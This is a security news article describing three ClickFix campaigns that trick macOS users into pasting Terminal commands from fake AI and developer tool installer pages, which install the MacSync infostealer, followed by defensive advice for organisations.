ClickFix Campaigns Spread MacSync on macOS

Researchers found three ClickFix campaigns pushing a macOS infostealer called MacSync via fake AI and developer tool installers. Rather than exploiting a software flaw, the attacks rely on users copying and running malicious Terminal commands from convincing setup pages hosted on legitimate platforms such as Cloudflare Pages, Squarespace, and Tencent EdgeOne. The lures have been spread through malicious search ads and have targeted people looking for tools like Claude Code. The campaign underlines a familiar truth: if attackers can persuade users to do the dangerous bit themselves, life gets much easier for them.

Fake AI installers, real macOS trouble

Mac users have long enjoyed telling Windows users that “we don’t really get malware”. Cybercriminals, naturally, took that as a challenge.
Researchers have identified three separate ClickFix campaigns distributing a macOS infostealer known as MacSync. The trick is irritatingly simple: instead of exploiting a technical flaw, the attackers persuade users to copy and paste dodgy Terminal commands while trying to install what appears to be a legitimate AI or developer tool. It is less “sophisticated cyber exploit” and more “please sabotage your own Mac for us”.

How the scam works

Victims are lured through malicious search adverts to convincing pages hosted on otherwise reputable services, including Cloudflare Pages, Squarespace and Tencent EdgeOne. These pages present fake installation instructions for tools such as Claude Code, encouraging the user to run obfuscated commands in Terminal. Once executed, those commands install the MacSync malware, which is designed to steal information from the compromised device.

Why it matters

This style of attack is particularly effective because it avoids the usual exploit chain. There is no noisy browser crash, no flashy zero-day, just a user doing exactly what the page tells them. That makes the campaign harder to stop with traditional vulnerability-based thinking and highlights the growing overlap between social engineering, developer tooling and AI-themed lures.

What organisations should do

Security teams should train staff never to run unknown Terminal commands copied from websites, even if the page looks polished and the tool sounds trendy. Blocking malicious ads, monitoring for suspicious shell activity and controlling who can install software on macOS endpoints would all help. In short: if a website tells you to paste mystery commands into Terminal, assume the website is not your friend.